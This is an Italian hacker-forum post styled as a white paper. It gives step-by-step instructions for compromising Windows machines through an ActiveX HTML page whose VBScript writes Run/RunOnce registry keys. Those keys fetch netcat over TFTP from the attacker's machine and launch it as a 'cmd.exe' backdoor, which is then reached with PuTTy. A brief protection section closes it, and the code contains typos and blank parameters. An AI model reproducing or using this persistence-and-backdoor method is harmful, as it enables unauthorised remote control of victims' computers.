BEAST la bestia - Il Forum dell'Hacker

Le informazioni contenute in questo Forum sono esclusivamente a scopo informativo, pertanto non mi riterrò responsabile di eventuali danni provocati da un uso improprio da parte degli utenti. Declino ogni responsabilità per l’uso l’utilizzo e/o l’abuso.
 
IndiceCalendarioFAQCercaLista utentiGruppiRegistrarsiAccedi

Condividere | 
 

 Infezione e penetrazione con Visual Basic Script e Netcat

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso 
AutoreMessaggio
Admin
Admin


Messaggi : 19
Data d'iscrizione : 04.02.09
Località : Salerno

MessaggioOggetto: Infezione e penetrazione con Visual Basic Script e Netcat   Lun Feb 23, 2009 4:36 am

Infezione e penetrazione con Visual Basic script e Netcat

Sommario
1. Introduzione
2. Preparazione dell’attacco
2.1 Attacco
3. Protezione
4. In rete

1. Introduzione
Esistono metodi di penetrazioni così semplici che la possibilità di cascarci è alta.
Questo white paper mostra come un attaccante con un qualche codice VBS e un semplice programma riesca ad avvere accesso completo sul sistema vittima.


2. Preparazione di un attacco
Per incominciare, bisogna sapere che per l’operazione bisogna avere installato sul computer:
- NETCAT (http://www.vulnwatch.org/netcat/)
- Tftpd32 (http://tftpd32.jounin.net/)
- PuTTy (http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe)
- E avere uno spazio web, va bene anche una pagina HTML sul proprio PC.
Avviate Tftpd32 e cliccate sull’etichetta ‘Tftp Server’ e nell’input server interface inserite il vostro indirizzo ip. Questo aprirà un server FTP sul vostro

computer così da poter far scaricare all’utente vittima il programma NETCAT.

Il seguente codice andrà salvato in un file HTML.
Questo codice scritto in Visual Basic script non fa altro che creare due chiavi nel registro di sistema con i nomi HACK1 e HACK2 in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\ e HKLM\Software\Microsoft\Windows\CurrentVersion\Run\.
All’interno delle due chiavi ci sono due operazioni differenti. La prima stringa, alle 10:37 scarica NETCAT (nc.exe) e la seconda avvia NETCAT in “modalità backdoor” per permettere all’attaccante di accedere al computer vittima.

set WshShell=CreateOnject(”Wscript.Shell”)
WshShell.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\HACK1", "at 10:37 cmd /c tftp -i get nc.exe"
EshShell.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HACK2","at 10:38 cmd /c nc -nv -L -p -e cmd.exe"

Avvertenze: Il programma va posizionato sul disco C. Se la lettera del volume si dovrà modificare il codice VBS per un corretto funzionamento.

Settate i parametri richiesti e salvatela su un vostro spazio web o sul vostro Desktop, ciò non ha importanza poichè si sta studiando il funzionamento di

questo attacco.

2.1 Attacco
Adesso aprite il file appena salvato e cliccate su ‘Esegui controllo AciveX’ del browser. Noterete che sul programma Tftpd32 ci sarà una richiesta di download da parte dell’utente vittima. A questo punto copiamo il suo indirizzo IP e apriamo PuTTy per poi accedere al suo sistema da remoto, semplicemente
spuntando il label RAW, inserendo l’indirizzo IP nell’input apposito e cliccando sul tasto ‘Connect’.

Se tutto andrà a buon fine, avrete accesso al computer vittima con i privilegi dell’utente che ha avviato NETCAT. Ossia se l’utente con privilegi amministrativi avvia NETCAT, vi ritroverete con privilegi amministrativi.

3. Protezione
Per proteggersi da questa tipologia di attacco ci sono tre modi differenti:
- Usare un browser alternativo come Mozilla Firerox. Mozilla non supporta gli ActiveX.
- Disabilitare gli ActiveX da Internet Explorer.
- Usare un Firewall. Se eventualmente acconsetite all’esecuzione dell’ActiveX
Tornare in alto Andare in basso
Vedere il profilo dell'utente http://beast.forumitalian.com
 
Infezione e penetrazione con Visual Basic Script e Netcat
Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto 
Pagina 1 di 1
 Argomenti simili
-
» videotoutorial: come si crea un cronometro in visual basic

Permesso di questo forum:Non puoi rispondere agli argomenti in questo forum
BEAST la bestia - Il Forum dell'Hacker :: PROGRAMMAZIONE-
Andare verso: